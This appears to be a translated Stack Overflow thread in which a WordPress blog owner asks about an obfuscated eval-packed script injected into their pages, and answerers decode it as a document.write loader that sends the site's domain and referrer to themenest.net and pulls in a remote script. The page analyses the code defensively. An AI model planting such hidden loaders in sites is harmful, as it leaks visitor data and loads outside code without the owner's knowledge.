这段代码在我的Wordpress博客上做了什么?恶意软件?

时间:2013-04-14 11:53:02

标签: javascript wordpress

我发现每次加载网站时都会加载以下代码,请回复一下我在博客上执行的功能吗?

themenest.net是我看到的网址,当我看到加载我的网站时

<script type="text/javascript">
    eval(function (p, a, c, k, e, r) {
        e = function (c) {
            return c.toString(a)
        };
        if (!''.replace(/^/, String)) {
            while (c--) r[e(c)] = k[c] || e(c);
            k = [function (e) {
                    return r[e]
                }
            ];
            e = function () {
                return '\\w+'
            };
            c = 1
        };
        while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
        return p
    }('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {}));
</script>

任何人都知道??

4 个答案:

答案 0 :(得分:6)

如果您打开包装,代码为:

document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');

...从http://themenest.net/platform/script/track检索脚本资源,传递有关其所在文档的信息以及将您带到该文档的引用链接。我不知道那个脚本资源可能是什么(可能没什么,重点可能只是跟踪;查看浏览器的“网络”选项卡以查看返回的内容)。

是否是某种恶意软件取决于您与themenest.net的关系。 : - )

答案 1 :(得分:1)

该代码注入了这个脚本元素:

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

这是一个跟踪器,很可能来自于主题(您最初获得主题的地方),它可以检测用户对主题的使用情况。这很可能是他们的分析脚本。

脚本获取:

  • 您的domain name(当前网页域名,使用主题的网站)
  • referrer(到达包含该脚本的网站页面之前的位置)
  • 并使用缓存清除机制每次加载最新版本的脚本

答案 2 :(得分:0)

这与推荐,跟踪和域名有关。它被打包,因此无法读取确切的代码。只有你打开包装:

eval document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');

答案 3 :(得分:0)

看起来这是用于referal和/或记录引用域的,因为你可以看到

track|domain|r|encodeURIComponent|referrer

您需要打开包装才能看到真正的来源。

刚刚解压缩,你去了:

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

正如我上面所写,它只是将您的域名记录到themenest.net服务器。

我想这样可以找出版权滥用行为。

相关问题
最新问题